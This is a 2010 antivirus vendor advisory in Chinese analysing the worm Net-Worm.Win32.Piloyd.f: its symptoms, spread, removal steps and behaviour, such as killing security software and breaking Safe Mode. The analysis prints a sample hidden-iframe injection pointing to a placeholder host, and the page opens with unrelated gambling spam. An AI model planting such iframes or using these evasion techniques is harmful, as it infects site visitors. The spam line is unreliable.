beplay体育app下载/欧国联含金量高吗/辽宁篮球直播/福彩快乐8走势图一定牛

   
首 頁  |  微點新聞  |  業界動態  |  安全資訊  |  安全快報  |  產品信息  |  網絡版首頁
通行證  |  客服中心  |  微點社區  |  微點郵局  |  常見問題  |  在線訂購  |  各地代理商
 

“中華吸血鬼”變種Net-Worm.Win32.Piloyd.f
來源:  2010-05-06 17:48:13

“中華吸血鬼”變種

Net-Worm.Win32.Piloyd.f

捕獲時間

2010-5-6

危害等級



病毒癥狀

  該樣本是使用“Visual C /C”編寫的蠕蟲程序,由微點主動防御軟件自動捕獲,采用“UPX”加殼方式試圖躲避特征碼掃描加殼后的長度為“26,112字節“,圖標為“
”,病毒擴展名為“exe”,主要通過“網頁掛馬”、“文件捆綁”、“下載器下載”、“移動存儲介質”等方式傳播。病毒主要目的下載病毒木馬在本地運行。
   用戶中毒后,會出現出現網絡運行緩慢, Windows系統無故報錯死機,殺軟無故退出,無法進入安全模式等現象。

感染對象

Windows 2000/Windows XP/Windows 2003/Windows Vista/ Windows 7

傳播途徑

移動介質、網頁木馬、文件捆綁、下載器下載

防范措施

已安裝使用微點主動防御軟件的用戶,無須任何設置,微點主動防御將自動保護您的系統免受該病毒的入侵和破壞。無論您是否已經升級到最新版本,微點主動防御都能夠有效清除該病毒。如果您沒有將微點主動防御軟件升級到最新版,微點主動防御軟件在發現該病毒后將報警提示您發現“未知木馬“,請直接選擇刪除處理(如圖1);


圖1 微點主動防御軟件自動捕獲未知病毒(未升級)




如果您已經將微點主動防御軟件升級到最新版本,微點將報警提示您發現木馬"Net-Worm.Win32.Piloyd.f”,請直接選擇刪除(如圖2)。


圖2   微點主動防御軟件升級后截獲已知病毒




未安裝微點主動防御軟件的手動解決辦法

1.手動刪除以下文件:

%SystemRoot%\system32\qmgr.dll
X:\AutoRun.inf
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe  (X為系統各個盤符)

2.手動修復以下注冊表鍵值:

將正常的安全模式注冊表值導入到如下位置:
鍵:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
鍵:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

3. 手動修復以下文件

拷貝正常的hosts文件到: %SystemRoot%\system32\drivers\etc\hosts

變量聲明:

 %SystemDriver%        系統所在分區,通常為“C:\”
 %SystemRoot%         WINDODWS所在目錄,通常為“C:\Windows”
 %Documents and Settings%  用戶文檔目錄,通常為“C:\Documents and Settings”
 %Temp%            臨時文件夾,通常為“C:\Documents and Settings\當前用戶名稱\Local Settings\Temp”
 %ProgramFiles%       系統程序默認安裝目錄,通常為:“C:\ProgramFiles”

病毒分析

1、病毒運行后,查找注冊表鍵HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,查看netsvcs服務是否開啟。
2、如果開啟,嘗試關閉此服務;如果此服務關閉,則查找查找%SystemRoot%\system32\qmgr.dll,調用sfc_os.#5函數去除系統文件保護,釋放病毒文件%SystemRoot%\system32\qmgr.dll,替換系統文件完成自啟動。
3、釋放%Temp%\Loopt.bat批處理文件,刪除病毒源文件。
4、在qmgr.dll中,比較自己是否在360tray.exe中,通過向設備"\\.\360SpShadow0"發送控制碼,結束360tray.exe進程。
5、創建線程,循環遍歷查找avp.exe、bdagent.exe、360tray.exe進程,如果找到則結束其進程。
6、修改注冊表相關鍵值,禁用任務管理器和禁用顯示隱藏文件;并通過刪除注冊表對應鍵值破壞安全模式
7、全盤查找后綴名為html、htm、asp、aspx、php、jsp格式的網頁文件,如果找到,往目標文件中插入類似<iframe  src=http://www.xx.cn/1.htm width=0 height=0></iframe>的惡意代碼,并搜索后綴名為"gho、GHO、Gho"的文件,一旦找到,將其刪除。使用戶丟失系統備份數據。
8、病毒通過加載系統核心文件NTDLL.DLL,獲得相關API函數虛擬地址,操作PhysicalMemory內核對象,并提升權限,從而實現對物理內存的直接讀寫操作。
9、全盤查找后綴名為rar、zip、tgz、tar的壓縮包文件,一旦找到,利用%ProgramFiles%\WinRAR\Rar.exe程序將目標壓縮包解壓,將病毒程序"安裝.bat"復制到解壓出來的文件夾中,然后再壓縮回去,完成將病毒添加到壓縮包的功能
10.釋放%Temp%\NtHid.sys驅動文件,創建名稱為"NtHid"的服務,恢復SSDT,遍歷查找并結束安全軟件的進程,刪除安全軟件的相關文件,最后刪除驅動文件 。
11、修改%SystemRoot%\System32\drivers\etc\hosts文件,屏蔽安全廠商網址和百度等網址。
12、開啟網絡,從指定地址下載大量病毒到本地運行,并統計被感染主機相關信息,將用戶機器操作系統,MAC等信息發送到指定網址。
13、在每個盤符下生成文件AutoRun.inf,并創建目錄 recycle.{645FF040-5081-101B-9F08-00AA002F954E},釋放病毒文件recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe,并設置為隱藏,使用戶每次雙擊磁盤和打開資源管理器時自動運行病毒。

病毒創建文件

%SystemRoot%\system32\qmgr.dll
%Temp%\Loopt.bat
%Temp%\NtHid.sys
X:\AutoRun.inf
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe  (X為被感染盤符)

病毒創建注冊表

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\下建立大量安全軟件的映像劫持
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ NtHid

病毒刪除注冊表

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

病毒刪除文件

%Temp%\NtHid.sys

病毒修改文件

%SystemRoot%\System32\drivers\etc\hosts

免費體驗
下  載
安裝演示